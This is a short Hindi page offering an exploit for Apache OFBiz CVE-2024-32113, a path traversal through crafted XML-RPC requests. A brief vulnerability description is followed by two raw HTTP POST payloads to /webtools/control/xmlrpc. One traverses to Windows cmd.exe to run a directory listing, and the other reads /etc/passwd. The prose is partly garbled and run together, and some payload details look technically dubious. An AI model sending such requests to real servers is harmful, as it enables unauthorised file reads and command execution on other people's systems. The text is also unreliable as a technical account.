
Apache OFBiz CVE-2024-32113 के लिए एक्सप्लॉइट — क्राफ्टेड XML-RPC अनुरोधों के माध्यम से पाथ ट्रैवर्सल, जो असुरक्षित सर्वरों पर मनमानी फ़ाइल पढ़ने और संभावित कमांड निष्पादन को सक्षम बनाता है।
Apache OFBiz 18.12.12 तक के संस्करणों में एक गंभीर (critical) के रूप में वर्गीकृत भेद्यता पाई गई है। यह मुद्दा एक अज्ञात कार्यक्षमता को प्रभावित करता है। किसी अज्ञात इनपुट के साथ की गई छेड़छाड़ path traversal भेद्यता की ओर ले जाती है। उत्पाद एक पाथनाम (pathname) बनाने के लिए बाहरी इनपुट का उपयोग करता है, जिसका उद्देश्य किसी ऐसी फ़ाइल या निर्देशिका की पहचान करना होता है जो किसी प्रतिबंधित पैरेंट निर्देशिका के अंतर्गत स्थित होती है, लेकिन उत्पाद पाथनाम के भीतर मौजूद विशेष तत्वों को ठीक से निष्प्रभावी नहीं करता है, जिसके कारण पाथनाम प्रतिबंधित निर्देशिका के बाहर किसी स्थान पर हल हो सकता है। इसका प्रभाव गोपनीयता (confidentiality), अखंडता (integrity) और उपलब्धता (availability) पर पड़ता है।
etc/passwd फ़ाइल को इंगित करने के लिए ../../../../../../etc/passwd पैरामीटर का उपयोग करता है।etc/passwd फ़ाइल को पढ़ने का प्रयास करेगा, जिसमें सर्वर पर उपयोगकर्ताओं के बारे में संवेदनशील जानकारी होती है।POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>